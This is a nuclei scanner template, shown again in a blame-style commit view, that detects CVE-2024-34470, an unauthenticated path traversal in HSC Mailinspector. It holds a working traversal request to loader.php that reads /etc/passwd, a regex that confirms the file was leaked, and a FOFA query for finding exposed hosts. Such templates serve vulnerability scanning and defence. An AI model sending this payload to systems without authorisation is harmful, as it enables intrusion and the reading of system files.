nuclei-templates/http/cves/2024/CVE-2024-34470.yaml

id: CVE-2024-34470

info:
  name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
  author: topscoder
  severity: high
  description: |
    An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
  reference:
    - https://github.com/osvaldotenorio/CVE-2024-34470
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-34470
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 2
    fofa-query: "mailinspector/public"
  tags: cve,cve2024,lfi,mailinspector,hsc

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/login.php"

    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "Licensed to HSC TREINAMENTO"

  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022051184fed9b9a4b1966d32d775675ae1770f24224d547667500500ad3177f5476022100fc9e3a62f08e8debfd9a15e004208573ed4273bfd4d6f2d48e09f8a46bcff1ce:922c64590222798bb761d5b6d8e72950
Create CVE-2024-34470.yaml 2024-05-30 12:04:18 +00:00			`id: CVE-2024-34470`

			`info:`
			`name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion`
			`author: topscoder`
			`severity: high`
			`description: \|`
			`An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.`
			`reference:`
			`- https://github.com/osvaldotenorio/CVE-2024-34470`
			`- https://github.com/nomi-sec/PoC-in-GitHub`
			`- https://github.com/fkie-cad/nvd-json-data-feeds`
added flow 2024-05-30 13:26:04 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2024-34470`
Create CVE-2024-34470.yaml 2024-05-30 12:04:18 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
			`epss-score: 0.00043`
			`epss-percentile: 0.0866`
			`metadata:`
added flow 2024-05-30 13:26:04 +00:00			`verified: true`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`max-request: 2`
Create CVE-2024-34470.yaml 2024-05-30 12:04:18 +00:00			`fofa-query: "mailinspector/public"`
			`tags: cve,cve2024,lfi,mailinspector,hsc`

added flow 2024-05-30 13:26:04 +00:00			`flow: http(1) && http(2)`

Create CVE-2024-34470.yaml 2024-05-30 12:04:18 +00:00			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/mailinspector/login.php"`

			`host-redirects: true`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "Licensed to HSC TREINAMENTO"`

			`- method: GET`
			`path:`
			`- "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`part: body`
			`regex:`
			`- "root:.*:0:0:"`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a00473045022051184fed9b9a4b1966d32d775675ae1770f24224d547667500500ad3177f5476022100fc9e3a62f08e8debfd9a15e004208573ed4273bfd4d6f2d48e09f8a46bcff1ce:922c64590222798bb761d5b6d8e72950`